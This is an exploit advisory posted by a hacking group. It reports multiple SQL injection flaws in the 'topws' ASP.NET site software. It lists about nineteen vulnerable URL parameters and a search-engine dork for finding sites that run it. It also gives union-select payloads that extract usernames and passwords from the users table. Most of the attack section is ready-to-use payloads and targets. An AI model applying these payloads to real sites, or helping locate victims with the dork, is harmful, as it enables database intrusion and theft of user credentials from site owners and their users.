TopWS suffers from multiple remote SQL injection vulnerabilities.
0bbb637ef1426ec1bad19e8d1efce5a2583d915d8d42142023a7368b158741ed
topws (.aspx) Multiple Sql Injection Vulnerability
===================================================================
####################################################################
.:. Author : AtT4CKxT3rR0r1ST
.:. Email : F.Hack@w.cn
.:. Team : Sec Attack Team
.:. Home : www.sec-attack.com/vb
.:. Script : topws
.:. Language : aspx
.:. Script Download: http://www.topwnet.com/
.:. Bug Type : Sql Injection[Mysql]
.:. Dork : "Site powered By Topws.com"
.:. Date : 31/1/2010
####################################################################
===[ Exploit ]===
www.Localhost.com/show_medical_articles_details.aspx?mid=[Sql Injection]
www.Localhost.com/show_news_details_ar.aspx?id=[Sql Injection]
www.Localhost.com/show_photogallery_details.aspx?cid=[Sql Injection]
www.Localhost.com/show_page.aspx?pid=[Sql Injection]
www.Localhost.com/show_events_details_ar.aspx?id=[Sql Injection]
www.Localhost.com/show_courses_details_ar.aspx?id=[Sql Injection]
www.Localhost.com/marquee_details.aspx?mid=[Sql Injection]
www.Localhost.com/show_consultations_details_ar.aspx?id=[Sql Injection]
www.Localhost.com/show_prev_courses_details_ar.aspx?id=[Sql Injection]
www.Localhost.com/show_consultations_details.aspx?id=[Sql Injection]
www.Localhost.com/show_members_detail.aspx?id=[Sql Injection]
www.Localhost.com/show_forum_pics.aspx?id=[Sql Injection]
www.Localhost.com/similar.aspx?pid=[Sql Injection]
www.Localhost.com/news.aspx?pid=[Sql Injection]
www.Localhost.com/show_similar.aspx?id[Sql Injection]
www.Localhost.com/showdtls.aspx?id=[Sql Injection]
www.Localhost.com/show_medical_articles_details_ar.aspx?mid=[Sql Injection]&home=y
www.Localhost.com/show_box_details.aspx?bid=[Sql Injection]
www.Localhost.com/show_istshareen.aspx?id=[Sql Injection]
ETC..........
***********************************************************************************
===[ ERROR ]====
Syntax error in string in query expression '[id]=''.
***********************************************************************************
*************************************************************************************
######## Name TableName : users
EXPLOIT| Name ColumnName: Id,Username,Password
########
null+union+select+1,username,3,4,password,6,7,8+from+users+where+id=1
null+union+select+1,username,3,password+from+users+where+id=1
null+union+select+username,2,password+from+users+where+id=1
ETC..........
*************************************************************************************
####################################################################
Greats T0: HackxBack & Zero Cold & All My Friend & All Member Sec Attack
________________________________
Your E-mail and More On-the-Go. Get Windows Live Hotmail Free. Sign up now.<https://signup.live.com/signup.aspx?id=60969>